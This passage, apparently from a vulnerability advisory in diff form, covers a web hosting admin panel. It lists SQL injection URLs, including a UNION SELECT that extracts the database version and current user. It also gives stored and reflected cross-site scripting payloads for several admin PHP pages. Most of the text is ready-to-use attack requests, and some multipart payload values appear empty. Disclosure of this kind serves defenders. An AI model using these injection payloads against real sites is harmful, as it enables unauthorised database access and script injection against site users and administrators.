+http://localhost/admin/omanage.php?search=1&cat=status%27&list=1&so=status +http://localhost/admin/hostingadmin.php?list=f&so=domain%27 +http://localhost/admin/aomanage.php?search=1&cat=status%20UNION%20select%201,2,3,version%28%29,5,current_user,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--&list=3&so=status' +http://localhost/admin/hostingarchiveadmin.php?search=1&cat=status UNION select 1--&list=1&so=status' +http://localhost/admin/dsarchiveadmin.php?search=1&cat=status&list=3&so=31 +http://localhost/admin/domainadmin.php?search=&cat=&list=&sd=&so=100 + + + +2. Cross-Site Scripting (Stored): +--------------------------------- + +http://localhost/admin/cmanage.php +Parameters: reason (POST) + +Payload(s): +%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E + +http://localhost/admin/helpdesk.php +Parameters: hd_name, hd_url, hd_subject (POST) + +Payload(s): +Content-Disposition: form-data; name="hd_name" + +"> +-----------------------------28698210634144 +Content-Disposition: form-data; name="hd_url" + +"> +-----------------------------28698210634144 +Content-Disposition: form-data; name="hd_subject" + + +-----------------------------28698210634144 + + + +3. Cross-Site Scripting (Reflected): +------------------------------------ + +http://localhost/admin/useradmin.php +Parameters: list (POST) + +http://localhost/admin/omanage.php?search=1%22%3E%3Cscript%3Ealert%283%29%3C/script%3E&cat=status%22%3E%3Cscript%3Ealert%284%29%3C/script%3E&list=4%22%3E%3Cscript%3Ealert%282%29%3C/script%3E&so=status%22%3E%3Cscript%3Ealert%281%29%3C/script%3E +Parameters: search, cat, list, so (GET) + +http://localhost/admin/ccmanage.php?find_enc=1&list=1%22%3E%3Cscript%3Ealert%281%29%3C/script%3E +Parameter: list (GET) + +http://localhost/admin/cmanage.php?edit=1&action=edit&add_credits=1&id=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E&search=&cat=&list=&sd=%22%3E%3Cscript%3Ealert%282%29%3C/script%3E +Parameters: id, sd (GET) + +Payload(s): +%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E \ No newline at end of file